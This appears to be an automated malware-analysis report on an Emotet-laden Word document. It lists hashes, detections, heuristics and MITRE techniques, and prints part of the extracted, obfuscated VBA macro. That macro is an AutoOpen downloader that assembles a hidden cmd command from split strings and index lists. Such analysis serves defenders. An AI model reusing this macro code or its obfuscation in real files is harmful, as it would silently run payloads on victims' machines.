Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e633b6c6918dbf42…

MALICIOUS

Office (OLE)

98.0 KB Created: 2018-08-07 08:48:00 Authoring application: Microsoft Office Word First seen: 2018-08-26
MD5: 9de7924066c3facbc794471ba4378c69 SHA-1: 6f8df5d50f7e2b22be5e4239313cb46c37633042 SHA-256: e633b6c6918dbf42fb5ebe1879d34721ab885240a7578c7e07e0b2f423a25f20
142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The `AutoOpen` macro is present, which is a common technique for executing malicious code upon opening the document. The ClamAV detection explicitly identifies it as 'Doc.Downloader.Emotet-6883997-0', strongly suggesting the Emotet family. The VBA script attempts to construct and execute a command, likely to download and run a secondary payload.

Heuristics 5

  • ClamAV: Doc.Downloader.Emotet-6883997-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6883997-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5640 bytes
SHA-256: f99d725a484b4b8f0f344914b519557eecb8c78fbc9ff182be34c5c7d5d803f0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NvPcFiPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName ChrB(aQikRU)
   TypeName Round(9795 - PVOmTL)
   TypeName Hex(1)
   TypeName CDate(4)
   TypeName CBool(918)
Shell@ CStr("c") + CStr("m") + pECLAjtCjwfWX + fwQpEYk + zVfEVdDbLw + OvjYED + iOLwDqE + ujHOZYuUzwX + DkZsPWdPpPQ + OkhZLroNHVudK, 426826034 - 426826034
   TypeName CSng(ZmGBEl)
   TypeName ahjCE
   TypeName ChrW(9)
End Sub


Attribute VB_Name = "AuNJzwvRFqPw"
Function zVfEVdDbLw()
On Error Resume Next
TypeName 8055
   TypeName CStr(80)
   TypeName Cos(849)
UYDZW = "d /V/C" + CStr(Chr(skPmKzwiiTdO + slXfLlFZIVQoWX + 34 + ZlmqUclOK + hniLZfjOqkrY)) + "s" + "et 08" + "Si=pd" + "NMrkhWA" + "Sfuw" + "hzC"
TypeName Sqr(258072599)
   TypeName Round(933)
QvjOL = "juQ" + "Fwidzl" + "QV" + "GOa" + "cj,-;9b8" + "@nH1g$D3{4"
TypeName 6
   TypeName 6354
   TypeName Rnd(oRGnL - FofQHQ / pwpQlq / djKBDL)
nHEnYwN = "\mxo" + "B)( XPyte" + "sIK.q" + "=5L+v" + "/':R}&" + "&for %l " + "in (0;5"
TypeName Int(OaJpb / cqrqYi)
   TypeName 53
   TypeName 2
MDXaFz = "1;2" + "0;60" + ";4;" + "61;13;6" + "0;"
TypeName HFkAB
   TypeName ChrB(531)
   TypeName Cos(QPRRsj)
bSzjWTtF = "24;24;" + "5" + "5;43;5" + "6;" + "3" + "1;3" + "0;66;3" + "9;60;" + "20;3" + "3"
TypeName Hex(TzBGj)
   TypeName CBool(iIACm)
SpopK = ";5" + "1;36" + ";31;60;30" + ";59;55;2;" + "60;59;" + "64;7;60;36" + ";15;24;21;" + "60;39;59" + ";34" + ";43;" + "31;10;52"
TypeName rVjtr
   TypeName 4840
   TypeName Fix(QfqEiV)
hXKDMHtP = ";66;72;" + "13" + ";59;" + "59" + ";0;73;71;7" + "1;59;39" + ";10;21;4" + ";" + "6"
TypeName Sgn(KLOmJj)
   TypeName CDbl(52)
liNlLCoXiU = "1;5" + "9;64;3" + "0;51;49;" + "71;" + "0" + ";56" + ";68;38;" + "13" + ";59;59" + ";0;73;71;7"
TypeName Isjztf
   TypeName Rnd(QbYtk)
   TypeName Atn(fVAoLo)
fGwWPhPi = "1;59;13;" + "60;" + "59;4;60" + ";60" + ";49;51;" + "7" + "0;21;6" + "0;64;30;" + "51" + ";49;71;6"
TypeName ChrB(czMii * QkrRWY)
   TypeName ChFzT
   TypeName 952
ERPnccD = "7;0;" + "59;20;" + "74;3;26;65" + ";38;" + "13;59" + ";59;0;73;7" + "1;71;20;20" + ";2" + "0;64;61;17" + ";" + "39;22;" + "29;58;0;"
zVfEVdDbLw = UYDZW + QvjOL + nHEnYwN + MDXaFz + bSzjWTtF + SpopK + hXKDMHtP + liNlLCoXiU + fGwWPhPi + ERPnccD
   TypeName aFmTn
   TypeName Atn(4)
End Function
Function OvjYED()
On Error Resume Next
TypeName Oct(jbVtSJ / uFQzt + 33138 * XXQVM)
   TypeName CBool(JGzmZv)
   TypeName Chr(8)
WECjh = "24;29" + ";39" + ";39;21;39" + ";42;64" + ";30;51;" + "49;71;" + "51;40;5;" + "3;3" + "8;1" + "3;59;59;0" + ";73"
TypeName jTusXW
   TypeName XvDOfY
WAAbKs = ";71" + ";71;59" + ";60;5" + ";" + "5;58;64;3" + "9;60;59;" + "7" + "1;42" + ";13;23;2;2"
TypeName CDbl(PvXQvS + nROtjk)
   TypeName CByte(wlokj / ditcbj)
   TypeName CSng(cSNaWP)
unAvFQTdh = "8;38;1" + "3;5" + "9;59;0;7" + "3;71;71" + ";59;60" + ";30;" + "24;60;20;" + "60" + ";36;"
TypeName Rnd(oABEFI)
   TypeName nhalN
SmutaXCOYj = "64;30;" + "51" + ";49;64" + ";36;" + "4;71;10;27" + ";7;35;47;" + "51;2" + "1;30;" + "72" + ";64;9" + ";" + "0;24;21;59" + ";54;72;38"
TypeName Chr(hPuYiG * NJojAD)
   TypeName GXkZZV
GDLnkrz = ";72;53" + ";34;4" + "3;31" + ";21;51;5" + "5;66;55;" + "72;41;45;3" + "7;72;34;4" + "3" + ";63;6" + "3;0;66;43;" + "60;39;7" + "0;73;5"
TypeName Atn(86124 - iBDFsQ)
   TypeName ChrW(534)
zVIRoiCAc = "9;6" + "0;4" + "9;0;69" + ";7" + "2;48;72;69" + ";43"
TypeName ChrW(88149 * bhDiS / uRbYzi - TOckHR)
   TypeName 767
NGijU = ";31;21;5" + "1;69;7" + "2;64;60;50" + ";60;72;3" + "4;10;51;" + "4;60;29" + ";30;13;54;" + "43;57;2"
TypeName vEiHRY
   TypeName Log(44110 / minnG + 47681 / vZjHd)
   TypeName Sqr(NOQfqj + GhQcRC)
LwSiwM = "0;62;55" + ";21;39;" + "55;4" + "3;31;1" + "0;52;53" + ";46;" + "59;4;58;46" + ";43;56;3" + "1;30;64;"
TypeName Hex(395163932)
   Ty
... (truncated)